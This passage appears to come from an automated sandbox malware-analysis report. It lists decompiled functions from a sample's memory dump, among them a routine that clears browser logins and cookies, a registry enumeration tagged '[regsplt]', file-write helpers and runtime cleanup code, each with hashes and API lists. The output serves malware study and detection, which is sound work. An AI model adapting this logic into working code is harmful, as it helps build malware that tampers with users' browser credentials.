                              • API String ID: 269201875-0
                              • Opcode ID: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
                              • Instruction ID: b8c2f117a08c9f7e3d0690f36157727bc88d5e2796b8de3530b344be676623de
                              • Opcode Fuzzy Hash: f5a743782674b4330f893bb4fce6fbdccd014e0b763f5d5a9f30bb5d138f4f29
                              • Instruction Fuzzy Hash: A641F772A002109FCB10DF79C881A6EB3B5EF89314F15816EE915EB341EB34ED01CB85
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E0040A8C0(void* __edi) {
                              				char _v5;
                              				char _v6;
                              				char _v7;
                              				void* __ebx;
                              				void* __ecx;
                              				void* __ebp;
                              				intOrPtr _t18;
                              				void* _t36;
                              				intOrPtr _t40;
                              				char _t50;
                              				void* _t52;
                              				signed int _t53;
                              				signed int _t54;
                              				void* _t55;
                              
                              				_t52 = __edi;
                              				_t54 = _t53 & 0xfffffff8;
                              				 *0x46bafd = 1;
                              				Sleep( *0x46baf8);
                              				_v7 = 0;
                              				_t36 = 0;
                              				_v6 = 0;
                              				_v5 = 0;
                              				goto L1;
                              				do {
                              					do {
                              						L1:
                              						_t59 = _t36;
                              						if(_t36 == 0) {
                              							L2:
                              							_t36 = E0040A7A6(_t59);
                              						}
                              						_t60 = _t36;
                              						if(_t36 == 0) {
                              							_t36 = E0040A5CA(_t52, _t60);
                              						}
                              						_t61 = _v6;
                              						if(_v6 == 0) {
                              							_v6 = E0040A3AF(_t36, _t52, _t61);
                              						}
                              						_t62 = _v7;
                              						if(_v7 == 0) {
                              							_v7 = E0040A320(_t52, _t62);
                              						}
                              						_t50 = _v5;
                              						_t63 = _t50;
                              						if(_t50 == 0) {
                              							_t50 = E0040A291(_t52, _t63);
                              							_v5 = _t50;
                              						}
                              						if(_t36 == 0 || _t36 == 0) {
                              							L16:
                              							Sleep(0x1388);
                              							_t18 = _v7;
                              							_t40 = _v6;
                              							_t50 = _v5;
                              						} else {
                              							_t18 = _v7;
                              							if(_t18 == 0 || _t50 == 0) {
                              								goto L16;
                              							} else {
                              								_t40 = _v6;
                              								if(_t40 == 0) {
                              									goto L16;
                              								}
                              							}
                              						}
                              						if(_t36 == 0) {
                              							goto L2;
                              						}
                              					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
                              					_t73 = _t40;
                              				} while (_t40 == 0);
                              				_t55 = _t54 - 0x18;
                              				E00402064(_t36, _t55, "\n[Cleared browsers logins and cookies.]\n");
                              				L0040AA8C(_t36, _t50, _t73);
                              				E00402064(_t36, _t55, "Cleared browsers logins and cookies.");
                              				_t56 = _t55 - 0x18;
                              				E00402064(_t36, _t55 - 0x18, "[Info]");
                              				E004165D8(_t36, _t52);
                              				E00402064(_t36, _t56 + 0x18, 0x45f6ac);
                              				_push(0xaf);
                              				L00404A6E(_t36, 0x46c768, _t50, _t73);
                              				if( *0x46bafc != 0) {
                              					E004105A0(0x46c518, L00401F75(0x46c518), "FR", 1);
                              				}
                              				 *0x46bafd = 0;
                              				return 0;
                              			}
                              0x0040a8c0
                              0x0040a8c3
                              0x0040a8ce
                              0x0040a8d5
                              0x0040a8e1
                              0x0040a8e5
                              0x0040a8e7
                              0x0040a8ed
                              0x0040a8ed
                              0x0040a8f1
                              0x0040a8f1
                              0x0040a8f1
                              0x0040a8f1
                              0x0040a8f3
                              0x0040a8f5
                              0x0040a8fa
                              0x0040a8fa
                              0x0040a8fc
                              0x0040a8fe
                              0x0040a905
                              0x0040a905
                              0x0040a90b
                              0x0040a90d
                              0x0040a914
                              0x0040a914
                              0x0040a91c
                              0x0040a91e
                              0x0040a925
                              0x0040a925
                              0x0040a929
                              0x0040a92d
                              0x0040a92f
                              0x0040a936
                              0x0040a938
                              0x0040a938
                              0x0040a93e
                              0x0040a958
                              0x0040a95d
                              0x0040a963
                              0x0040a967
                              0x0040a96b
                              0x0040a944
                              0x0040a944
                              0x0040a94a
                              0x00000000
                              0x0040a950
                              0x0040a950
                              0x0040a956
                              0x00000000
                              0x00000000
                              0x0040a956
                              0x0040a94a
                              0x0040a971
                              0x00000000
                              0x00000000
                              0x0040a973
                              0x0040a98b
                              0x0040a98b
                              0x0040a993
                              0x0040a99d
                              0x0040a9a2
                              0x0040a9ae
                              0x0040a9b3
                              0x0040a9bd
                              0x0040a9c2
                              0x0040a9d1
                              0x0040a9d6
                              0x0040a9e0
                              0x0040a9ec
                              0x0040aa01
                              0x0040aa07
                              0x0040aa08
                              0x0040aa15

                              APIs
                              Strings
                              • Cleared browsers logins and cookies., xrefs: 0040A9A9
                              • [Cleared browsers logins and cookies.], xrefs: 0040A998
                              • [Info], xrefs: 0040A9B8
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Sleep
                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
                              • API String ID: 3472027048-899236412
                              • Opcode ID: 1bd6dba79231424a18c026f3c1d748ec3a4d0886920e6503585f70a56013897d
                              • Instruction ID: 19d006f3e93ca70ec29b0e88cbd9a77eefac28184490fc762d726c12d351d6c4
                              • Opcode Fuzzy Hash: 1bd6dba79231424a18c026f3c1d748ec3a4d0886920e6503585f70a56013897d
                              • Instruction Fuzzy Hash: 7B3190013483816ECA1577B6142A7AB7F824A93748F09847FF9C4373D3DABA4859936F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E0041729F(void* __ecx, long __edx, WCHAR* _a4, long _a8) {
                              				void* _v8;
                              				long _v12;
                              				long _t10;
                              				long _t11;
                              				struct _OVERLAPPED* _t16;
                              				struct _OVERLAPPED* _t21;
                              				long _t24;
                              				long _t27;
                              				void* _t30;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t21 = 0;
                              				_v8 = __ecx;
                              				_t27 = __edx;
                              				_t10 = _a8;
                              				if(_t10 == 0) {
                              					_t11 = 0x40000000;
                              					_t24 = 2;
                              				} else {
                              					if(_t10 != 1) {
                              						_t11 = _a8;
                              						_t24 = _a8;
                              					} else {
                              						_t11 = 4;
                              						_t24 = _t11;
                              					}
                              				}
                              				_t30 = CreateFileW(_a4, _t11, _t21, _t21, _t24, 0x80, _t21);
                              				if(_t30 != 0xffffffff) {
                              					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
                              						if(WriteFile(_t30, _v8, _t27,  &_v12, _t21) != 0) {
                              							_t21 = 1;
                              						}
                              						CloseHandle(_t30);
                              						_t16 = _t21;
                              						goto L13;
                              					} else {
                              						CloseHandle(_t30);
                              						goto L6;
                              					}
                              				} else {
                              					L6:
                              					_t16 = 0;
                              					L13:
                              					return _t16;
                              				}
                              			}

                              0x004172a2
                              0x004172a3
                              0x004172a9
                              0x004172ab
                              0x004172af
                              0x004172b1
                              0x004172b3
                              0x004172cb
                              0x004172d0
                              0x004172b5
                              0x004172b8
                              0x004172c1
                              0x004172c4
                              0x004172ba
                              0x004172bc
                              0x004172bd
                              0x004172bd
                              0x004172b8
                              0x004172e4
                              0x004172e9
                              0x004172f3
                              0x00417320
                              0x00417322
                              0x00417322
                              0x00417325
                              0x0041732b
                              0x00000000
                              0x00417305
                              0x00417306
                              0x00000000
                              0x00417306
                              0x004172eb
                              0x004172eb
                              0x004172eb
                              0x0041732d
                              0x00417333
                              0x00417333

                              APIs
                              • CreateFileW.KERNEL32(00405D1C,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,004173C9,00000000,00000000), ref: 004172DE
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,004173C9,00000000,00000000,00000000,00000004), ref: 004172FA
                              • CloseHandle.KERNEL32(00000000,?,004173C9,00000000,00000000,00000000,00000004), ref: 00417306
                              • WriteFile.KERNEL32(00000000,00000000,00000000,00405D1C,00000000,?,004173C9,00000000,00000000,00000000,00000004), ref: 00417318
                              • CloseHandle.KERNEL32(00000000,?,004173C9,00000000,00000000,00000000,00000004), ref: 00417325
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreatePointerWrite
                              • String ID:
                              • API String ID: 1852769593-0
                              • Opcode ID: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
                              • Instruction ID: ea825e8bd67a10857e8b7964dc2fd0b8df6dfe7544f80a4ef1d900d86e80f7e8
                              • Opcode Fuzzy Hash: 255b8a181737147229ba99e999fd0b5ca8637e7c11ae7a67e0008db9ce4defcd
                              • Instruction Fuzzy Hash: 0E11A371204118BFEB104F64AC89EFB777CEB05365F104266FD25D6280C6748E819668
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E0044618A() {
                              				int _v8;
                              				void* __ecx;
                              				void* _t6;
                              				int _t7;
                              				char* _t13;
                              				int _t17;
                              				void* _t19;
                              				char* _t25;
                              				WCHAR* _t27;
                              
                              				_t27 = GetEnvironmentStringsW();
                              				if(_t27 == 0) {
                              					L7:
                              					_t13 = 0;
                              				} else {
                              					_t6 = E00446153(_t27);
                              					_pop(_t19);
                              					_t17 = _t6 - _t27 >> 1;
                              					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                              					_v8 = _t7;
                              					if(_t7 == 0) {
                              						goto L7;
                              					} else {
                              						_t25 = E0043E61D(_t19, _t7);
                              						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                              							_t13 = 0;
                              						} else {
                              							_t13 = _t25;
                              							_t25 = 0;
                              						}
                              						L0043EE85(_t25);
                              					}
                              				}
                              				if(_t27 != 0) {
                              					FreeEnvironmentStringsW(_t27);
                              				}
                              				return _t13;
                              			}
                              0x00446199
                              0x0044619f
                              0x004461f7
                              0x004461f7
                              0x004461a1
                              0x004461a2
                              0x004461a7
                              0x004461b0
                              0x004461b6
                              0x004461bc
                              0x004461c1
                              0x00000000
                              0x004461c3
                              0x004461c9
                              0x004461ce
                              0x004461ec
                              0x004461e6
                              0x004461e6
                              0x004461e8
                              0x004461e8
                              0x004461ef
                              0x004461f4
                              0x004461c1
                              0x004461fb
                              0x004461fe
                              0x004461fe
                              0x0044620c

                              APIs
                              • GetEnvironmentStringsW.KERNEL32 ref: 00446193
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004461B6
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004461DC
                              • _free.LIBCMT ref: 004461EF
                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004461FE
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                              • String ID:
                              • API String ID: 2278895681-0
                              • Opcode ID: 1d06af7fe9b9c0b38868f9dfd187ca8fc9741270ba8cbd3e824131a6f2c0cc53
                              • Instruction ID: a4a757ec6fd77dd09b4353e0e1f60453f24905d0662e5e34b4457866c2e58ca0
                              • Opcode Fuzzy Hash: 1d06af7fe9b9c0b38868f9dfd187ca8fc9741270ba8cbd3e824131a6f2c0cc53
                              • Instruction Fuzzy Hash: A901D4B26017117B73211AB76C8CC7B696DDAC7BA6716013EB914C3242DE69CE0281BA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 82%
                              			E004409F6(void* __ecx) {
                              				void* __esi;
                              				intOrPtr _t2;
                              				void* _t4;
                              				void* _t10;
                              				void* _t11;
                              				void* _t13;
                              				void* _t15;
                              				long _t16;
                              
                              				_t11 = __ecx;
                              				_t16 = GetLastError();
                              				_t10 = 0;
                              				_t2 =  *0x46a1e0; // 0x6
                              				_t19 = _t2 - 0xffffffff;
                              				if(_t2 == 0xffffffff) {
                              					L2:
                              					_t15 = L0043DFD9(_t11, 1, 0x364);
                              					_pop(_t13);
                              					if(_t15 != 0) {
                              						_t4 = L00440F8E(_t13, _t16, __eflags,  *0x46a1e0, _t15);
                              						__eflags = _t4;
                              						if(_t4 != 0) {
                              							E004407E4(_t13, _t15, 0x46b654);
                              							L0043EE85(_t10);
                              							__eflags = _t15;
                              							if(_t15 != 0) {
                              								goto L9;
                              							} else {
                              								goto L8;
                              							}
                              						} else {
                              							_push(_t15);
                              							goto L4;
                              						}
                              					} else {
                              						_push(_t10);
                              						L4:
                              						L0043EE85();
                              						L8:
                              						SetLastError(_t16);
                              					}
                              				} else {
                              					_t15 = L00440F38(_t11, _t16, _t19, _t2);
                              					if(_t15 != 0) {
                              						L9:
                              						SetLastError(_t16);
                              						_t10 = _t15;
                              					} else {
                              						goto L2;
                              					}
                              				}
                              				return _t10;
                              			}

                              APIs
                              • GetLastError.KERNEL32(?,?,?,00439E19,0043E660,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 004409FB
                              • _free.LIBCMT ref: 00440A30
                              • _free.LIBCMT ref: 00440A57
                              • SetLastError.KERNEL32(00000000), ref: 00440A64
                              • SetLastError.KERNEL32(00000000), ref: 00440A6D
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free
                              • String ID:
                              • API String ID: 3170660625-0
                              • Opcode ID: 028a3b3f714006f7a54fa04eab429af857446056a4e71c51cb6c7d6ce34851f3
                              • Instruction ID: 1381cb6b9671630b60042f8ed21df7efebf9c3361f552f6813510b12c123861f
                              • Opcode Fuzzy Hash: 028a3b3f714006f7a54fa04eab429af857446056a4e71c51cb6c7d6ce34851f3
                              • Instruction Fuzzy Hash: 4D014936141B0077F211A7726C8592B1628ABE17B6B24003BF606B22C2EE7CCD27812F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E004477EC(intOrPtr* _a4) {
                              				intOrPtr _t6;
                              				intOrPtr* _t21;
                              				void* _t23;
                              				void* _t24;
                              				void* _t25;
                              				void* _t26;
                              				void* _t27;
                              
                              				_t21 = _a4;
                              				if(_t21 != 0) {
                              					_t23 =  *_t21 -  *0x46a188; // 0x46a180
                              					if(_t23 != 0) {
                              						L0043EE85(_t7);
                              					}
                              					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46a18c; // 0x46b64c
                              					if(_t24 != 0) {
                              						L0043EE85(_t8);
                              					}
                              					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46a190; // 0x46b64c
                              					if(_t25 != 0) {
                              						L0043EE85(_t9);
                              					}
                              					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46a1b8; // 0x46a184
                              					if(_t26 != 0) {
                              						L0043EE85(_t10);
                              					}
                              					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                              					_t27 = _t6 -  *0x46a1bc; // 0x46b650
                              					if(_t27 != 0) {
                              						return L0043EE85(_t6);
                              					}
                              				}
                              				return _t6;
                              			}

                              APIs
                              • _free.LIBCMT ref: 00447804
                                • Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
                                • Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD
                              • _free.LIBCMT ref: 00447816
                              • _free.LIBCMT ref: 00447828
                              • _free.LIBCMT ref: 0044783A
                              • _free.LIBCMT ref: 0044784C
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: c9621e6e9bb6c527d0aa5a5513f425a73d73250b567ec94b1b2a79943738f87b
                              • Instruction ID: 4303ca86cc9478dbe0e1a161fb054b60f5dbdf3f65db9d6ac859b8e84f87df60
                              • Opcode Fuzzy Hash: c9621e6e9bb6c527d0aa5a5513f425a73d73250b567ec94b1b2a79943738f87b
                              • Instruction Fuzzy Hash: 21F0683240950067D620FB56E8C6C4773E9AB85B11B64182FF014E7641DF78FC86CA5E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E0043C51C(signed int __ecx) {
                              				intOrPtr _t7;
                              
                              				asm("lock xadd [eax], ecx");
                              				if((__ecx | 0xffffffff) == 0) {
                              					_t7 =  *0x46a9a0; // 0x3188680
                              					if(_t7 != 0x46a780) {
                              						L0043EE85(_t7);
                              						 *0x46a9a0 = 0x46a780;
                              					}
                              				}
                              				L0043EE85( *0x46ba08);
                              				 *0x46ba08 = 0;
                              				L0043EE85( *0x46ba0c);
                              				 *0x46ba0c = 0;
                              				L0043EE85( *0x46ba34);
                              				 *0x46ba34 = 0;
                              				L0043EE85( *0x46ba38);
                              				 *0x46ba38 = 0;
                              				return 1;
                              			}

                              APIs
                              • _free.LIBCMT ref: 0043C53A
                                • Part of subcall function 0043EE85: HeapFree.KERNEL32(00000000,00000000,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?), ref: 0043EE9B
                                • Part of subcall function 0043EE85: GetLastError.KERNEL32(?,?,00447A9F,?,00000000,?,00000000,?,00447D43,?,00000007,?,?,0044828E,?,?), ref: 0043EEAD
                              • _free.LIBCMT ref: 0043C54C
                              • _free.LIBCMT ref: 0043C55F
                              • _free.LIBCMT ref: 0043C570
                              • _free.LIBCMT ref: 0043C581
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 80c2171898103eb12c93d11cd7c08f3c9485e93dcbeac0e5505a8b45fced9d94
                              • Instruction ID: db1f80643b0f74365b7cf98d951e7b1d55b60743bdd7e37d059670ddde76a049
                              • Opcode Fuzzy Hash: 80c2171898103eb12c93d11cd7c08f3c9485e93dcbeac0e5505a8b45fced9d94
                              • Instruction Fuzzy Hash: 90F0F471803A209BCB116F96BC824063760E748B24B11152BF410E67B1FFB94596CFDF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E0041077E(void* __ecx) {
                              				int _v8;
                              				int _v12;
                              				int _v16;
                              				int _v20;
                              				int _v24;
                              				int _v28;
                              				int _v32;
                              				char _v56;
                              				int _v60;
                              				int _v64;
                              				int _v68;
                              				int _v72;
                              				int _v76;
                              				struct _FILETIME _v84;
                              				char _v95;
                              				char _v96;
                              				char _v108;
                              				char _v132;
                              				char _v156;
                              				short _v668;
                              				short _v1188;
                              				char _v11188;
                              				short _v43956;
                              				void* __ebx;
                              				void* __edi;
                              				int _t72;
                              				long _t73;
                              				void* _t93;
                              				long _t103;
                              				void* _t110;
                              				void* _t141;
                              				int _t145;
                              				int _t147;
                              				void* _t148;
                              				void* _t149;
                              
                              				_t112 = __ecx;
                              				E004505A0();
                              				_push(_t141);
                              				_t145 = 0;
                              				_t110 = __ecx;
                              				E00431810(_t141,  &_v1188, 0, 0x208);
                              				_t149 = _t148 + 0xc;
                              				_v24 = 0x104;
                              				_v8 = 0;
                              				_v12 = 0x3fff;
                              				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
                              				_t72 = _v8;
                              				if(_t72 != 0 && _t72 != 0) {
                              					do {
                              						_v28 = 0xff;
                              						_t103 = RegEnumKeyExW(_t110, _t145,  &_v668,  &_v28, 0, 0, 0,  &_v84);
                              						_t152 = _t103;
                              						if(_t103 == 0) {
                              							E004032F1(E004043E5(_t110,  &_v108,  &_v668, _t152, E0040425F(_t110,  &_v56, "\n")));
                              							L00401ED0();
                              							_t112 =  &_v56;
                              							L00401ED0();
                              						}
                              						_t145 = _t145 + 1;
                              					} while (_t145 < _v8);
                              				}
                              				_t73 = _v20;
                              				if(_t73 != 0) {
                              					_t147 = 0;
                              					if(_t73 != 0) {
                              						do {
                              							_v96 = 0;
                              							_v16 = 0x2710;
                              							asm("stosd");
                              							_v12 = 0x3fff;
                              							asm("stosd");
                              							asm("stosw");
                              							asm("stosb");
                              							_v43956 = 0;
                              							_t73 = RegEnumValueW(_t110, _t147,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
                              							_t156 = _t73;
                              							if(_t73 == 0) {
                              								E0043A6FF(_t112, _v32,  &_v96, 0xa);
                              								_t149 = _t149 + 0xc;
                              								E004032F1(E004043E5(_t110,  &_v56,  &_v43956, _t156, E0040425F(_t110,  &_v132, "\n")));
                              								L00401ED0();
                              								L00401ED0();
                              								E00403416(E004075C4(_t110,  &_v132,  &_v96,  &_v95, _t156, E00402064(_t110,  &_v56, "\n")));
                              								L00401FA7();
                              								L00401FA7();
                              								_t93 = E00402064(_t110,  &_v156, "[regsplt]");
                              								E00403416(L00402EFD( &_v132, E0040208B(_t110,  &_v56,  &_v96, _t156,  &_v11188, _v16), _t93));
                              								L00401FA7();
                              								L00401FA7();
                              								_t112 =  &_v156;
                              								_t73 = L00401FA7();
                              							}
                              							_t147 = _t147 + 1;
                              						} while (_t147 < _v20);
                              					}
                              				}
                              				return _t73;
                              			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Enum$InfoQueryValue
                              • String ID: [regsplt]
                              • API String ID: 3554306468-4262303796
                              • Opcode ID: 3f3a0cd878ec93b8675eb228901256b7c34dde97a7cea0d935366d3af322abb8
                              • Instruction ID: 22bbaa2dbcebefa3ea57dad675ad9f0084f54ab00d474abf25edfd55553df339
                              • Opcode Fuzzy Hash: 3f3a0cd878ec93b8675eb228901256b7c34dde97a7cea0d935366d3af322abb8
                              • Instruction Fuzzy Hash: CB511B71900219AADB10EA95CC85EEFB77DAF04304F50017AF505F2191EB786B49CBA9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E00445519(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                              				intOrPtr _v0;
                              				char _v6;
                              				char _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				signed int _v36;
                              				intOrPtr* _v64;
                              				intOrPtr _v96;
                              				intOrPtr* _v100;
                              				CHAR* _v104;
                              				signed int _v116;
                              				char _v290;
                              				signed int _v291;
                              				struct _WIN32_FIND_DATAA _v336;
                              				union _FINDEX_INFO_LEVELS _v340;
                              				signed int _v344;
                              				signed int _v348;
                              				intOrPtr _v440;
                              				intOrPtr* _t80;
                              				signed int _t82;
                              				signed int _t87;
                              				signed int _t91;
                              				signed int _t93;
                              				signed int _t95;
                              				signed int _t96;
                              				signed int _t100;
                              				signed int _t103;
                              				signed int _t108;
                              				signed int _t111;
                              				intOrPtr _t113;
                              				signed char _t115;
                              				union _FINDEX_INFO_LEVELS _t123;
                              				signed int _t128;
                              				signed int _t131;
                              				void* _t137;
                              				void* _t139;
                              				signed int _t140;
                              				signed int _t143;
                              				signed int _t145;
                              				signed int _t147;
                              				signed int* _t148;
                              				signed int _t151;
                              				void* _t154;
                              				CHAR* _t155;
                              				char _t158;
                              				char _t160;
                              				intOrPtr* _t163;
                              				void* _t164;
                              				intOrPtr* _t165;
                              				signed int _t167;
                              				void* _t169;
                              				intOrPtr* _t170;
                              				signed int _t174;
                              				signed int _t178;
                              				signed int _t179;
                              				intOrPtr* _t184;
                              				void* _t193;
                              				intOrPtr _t194;
                              				signed int _t196;
                              				signed int _t197;
                              				signed int _t199;
                              				signed int _t200;
                              				signed int _t202;
                              				union _FINDEX_INFO_LEVELS _t203;
                              				signed int _t208;
                              				signed int _t210;
                              				signed int _t211;
                              				void* _t213;
                              				intOrPtr _t214;
                              				void* _t215;
                              				signed int _t219;
                              				void* _t221;
                              				signed int _t222;
                              				void* _t223;
                              				void* _t224;
                              				void* _t225;
                              				signed int _t226;
                              				void* _t227;
                              				void* _t228;
                              
                              				_t80 = _a8;
                              				_t224 = _t223 - 0x20;
                              				if(_t80 != 0) {
                              					_t208 = _a4;
                              					_t160 = 0;
                              					 *_t80 = 0;
                              					_t199 = 0;
                              					_t151 = 0;
                              					_v36 = 0;
                              					_v336.cAlternateFileName = 0;
                              					_v28 = 0;
                              					__eflags =  *_t208;
                              					if( *_t208 == 0) {
                              						L9:
                              						_v12 = _v12 & 0x00000000;
                              						_t82 = _t151 - _t199;
                              						_v8 = _t160;
                              						_t191 = (_t82 >> 2) + 1;
                              						__eflags = _t151 - _t199;
                              						_v16 = (_t82 >> 2) + 1;
                              						asm("sbb esi, esi");
                              						_t210 =  !_t208 & _t82 + 0x00000003 >> 0x00000002;
                              						__eflags = _t210;
                              						if(_t210 != 0) {
                              							_t197 = _t199;
                              							_t158 = _t160;
                              							do {
                              								_t184 =  *_t197;
                              								_t17 = _t184 + 1; // 0x1
                              								_v8 = _t17;
                              								do {
                              									_t143 =  *_t184;
                              									_t184 = _t184 + 1;
                              									__eflags = _t143;
                              								} while (_t143 != 0);
                              								_t158 = _t158 + 1 + _t184 - _v8;
                              								_t197 = _t197 + 4;
                              								_t145 = _v12 + 1;
                              								_v12 = _t145;
                              								__eflags = _t145 - _t210;
                              							} while (_t145 != _t210);
                              							_t191 = _v16;
                              							_v8 = _t158;
                              							_t151 = _v336.cAlternateFileName;
                              						}
                              						_t211 = L0043BBA2(_t191, _v8, 1);
                              						_t225 = _t224 + 0xc;
                              						__eflags = _t211;
                              						if(_t211 != 0) {
                              							_t87 = _t211 + _v16 * 4;
                              							_v20 = _t87;
                              							_t192 = _t87;
                              							_v16 = _t87;
                              							__eflags = _t199 - _t151;
                              							if(_t199 == _t151) {
                              								L23:
                              								_t200 = 0;
                              								__eflags = 0;
                              								 *_a8 = _t211;
                              								goto L24;
                              							} else {
                              								_t93 = _t211 - _t199;
                              								__eflags = _t93;
                              								_v24 = _t93;
                              								do {
                              									_t163 =  *_t199;
                              									_v12 = _t163 + 1;
                              									do {
                              										_t95 =  *_t163;
                              										_t163 = _t163 + 1;
                              										__eflags = _t95;
                              									} while (_t95 != 0);
                              									_t164 = _t163 - _v12;
                              									_t35 = _t164 + 1; // 0x1
                              									_t96 = _t35;
                              									_push(_t96);
                              									_v12 = _t96;
                              									_t100 = E0044C479(_t164, _t192, _v20 - _t192 + _v8,  *_t199);
                              									_t225 = _t225 + 0x10;
                              									__eflags = _t100;
                              									if(_t100 != 0) {
                              										_push(0);
                              										_push(0);
                              										_push(0);
                              										_push(0);
                              										_push(0);
                              										E0043629A();
                              										asm("int3");
                              										_t221 = _t225;
                              										_push(_t164);
                              										_t165 = _v64;
                              										_t47 = _t165 + 1; // 0x1
                              										_t193 = _t47;
                              										do {
                              											_t103 =  *_t165;
                              											_t165 = _t165 + 1;
                              											__eflags = _t103;
                              										} while (_t103 != 0);
                              										_push(_t199);
                              										_t202 = _a8;
                              										_t167 = _t165 - _t193 + 1;
                              										_v12 = _t167;
                              										__eflags = _t167 - (_t103 | 0xffffffff) - _t202;
                              										if(_t167 <= (_t103 | 0xffffffff) - _t202) {
                              											_push(_t151);
                              											_t50 = _t202 + 1; // 0x1
                              											_t154 = _t50 + _t167;
                              											_t213 = L0043DFD9(_t167, _t154, 1);
                              											_t169 = _t211;
                              											__eflags = _t202;
                              											if(_t202 == 0) {
                              												L34:
                              												_push(_v12);
                              												_t154 = _t154 - _t202;
                              												_t108 = E0044C479(_t169, _t213 + _t202, _t154, _v0);
                              												_t226 = _t225 + 0x10;
                              												__eflags = _t108;
                              												if(__eflags != 0) {
                              													goto L37;
                              												} else {
                              													_t137 = E004458E8(_a12, __eflags, _t213);
                              													L0043EE85(0);
                              													_t139 = _t137;
                              													goto L36;
                              												}
                              											} else {
                              												_push(_t202);
                              												_t140 = E0044C479(_t169, _t213, _t154, _a4);
                              												_t226 = _t225 + 0x10;
                              												__eflags = _t140;
                              												if(_t140 != 0) {
                              													L37:
                              													_push(0);
                              													_push(0);
                              													_push(0);
                              													_push(0);
                              													_push(0);
                              													E0043629A();
                              													asm("int3");
                              													_push(_t221);
                              													_t222 = _t226;
                              													_t227 = _t226 - 0x150;
                              													_t111 =  *0x46a00c; // 0x5d382218
                              													_v116 = _t111 ^ _t222;
                              													_t170 = _v100;
                              													_push(_t154);
                              													_t155 = _v104;
                              													_push(_t213);
                              													_t214 = _v96;
